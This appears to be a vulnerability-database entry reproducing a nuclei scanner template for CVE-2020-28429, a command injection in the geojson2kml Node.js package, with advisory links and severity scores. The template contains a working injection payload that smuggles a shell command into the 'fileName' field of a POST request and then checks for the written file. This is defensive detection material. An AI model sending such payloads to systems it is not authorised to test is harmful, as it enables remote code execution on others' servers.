geojson2kml - Command Injection

03 Jul 2026 03:01:05
Reported by: ProjectDiscovery
Type: nuclei
Source: github.com

Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content. Successful exploitation could result in unauthorized access, remote code execution, or privilege escalation. Do not use geojson2kml.

Related

| Reporter | Title | Published | Family |
| --- | --- | --- | --- |
| Circl | CVE-2020-28429 | 23 Feb 2021 18:35 | circl |
| CNNVD | geojsonkml Command Injection Vulnerability | 23 Feb 2021 00:00 | cnnvd |
| CVE | CVE-2020-28429 | 23 Feb 2021 15:10 | cve |
| Cvelist | CVE-2020-28429 Command Injection | 23 Feb 2021 15:10 | cvelist |
| Github Security Blog | Command Injection in geojson2kml | 10 May 2021 15:59 | github |
| NVD | CVE-2020-28429 | 23 Feb 2021 15:15 | nvd |
| OSV | GHSA-W83X-FP72-P9QC Command Injection in geojson2kml | 10 May 2021 15:59 | osv |
| Prion | Command injection | 23 Feb 2021 15:15 | prion |
| Snyk | Command Injection | 11 Dec 2020 14:59 | snyk |
| Veracode | OS Command Injection | 24 Feb 2021 02:08 | veracode |

id: CVE-2020-28429

info:
  name: geojson2kml - Command Injection
  author: eeche,chae1xx1os,persona-twotwo,soonghee2
  severity: critical
  description: |
    Detects command injection vulnerability by checking if `hacked.txt` is created and contains the expected content.
  impact: |
    Successful exploitation of this vulnerability could result in unauthorized access, remote code execution, privilege escalation
  remediation: |
    Do not use geojson2kml. There is no fixed version for geojson2kml.
  reference:
    - https://snyk.io/vuln/SNYK-JS-GEOJSON2KML-1050412
    - https://github.com/advisories/GHSA-w83x-fp72-p9qc
    - https://nvd.nist.gov/vuln/detail/CVE-2020-28429
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-28429
    cwe-id: CWE-78
    epss-score: 0.63305
    epss-percentile: 0.99106
    cpe: cpe:2.3:a:geojson2kml_project:geojson2kml:*:*:*:*:*:node.js:*:*
  metadata:
    max-request: 1
    vendor: geojson2kml_project
    product: geojson2kml
    framework: node.js
  tags: cve,cve2020,rce,geojson2kml,file-upload,intrusive,vuln

variables:
  filename: '{{rand_base(6)}}'

http:
  - raw:
      - |
        POST /convert HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "fileName": "& echo \"{{randstr}}\" > {{filename}}.txt && ls",
          "geoJsonData": {
            "type": "FeatureCollection",
            "features": [
              {
                "type": "Feature",
                "geometry": {
                  "type": "Point",
                  "coordinates": [102.0, 0.5]
                },
                "properties": {
                  "prop0": "value0"
                }
              }
            ]
          }
        }

      - |
        GET /file/{{filename}}.txt HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - "{{randstr}}"

      - type: word
        part: header_2
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 490a0046304402203db203cb985e6d94bcf82eacc1471d36d031d0cf6ac6a56b2b3e1846501deed9022060efc824d09f9108ca721f682549f4355a0c6ff676285ab606ae99c3bfee88d8:922c64590222798bb761d5b6d8e72950

Scores (04 Feb 2026 07:00, current)

Vulners AI Score: 7.2 (High risk)
CVSS 2: 7.5
CVSS 3.1: 7.3 - 9.8
EPSS: 0.63305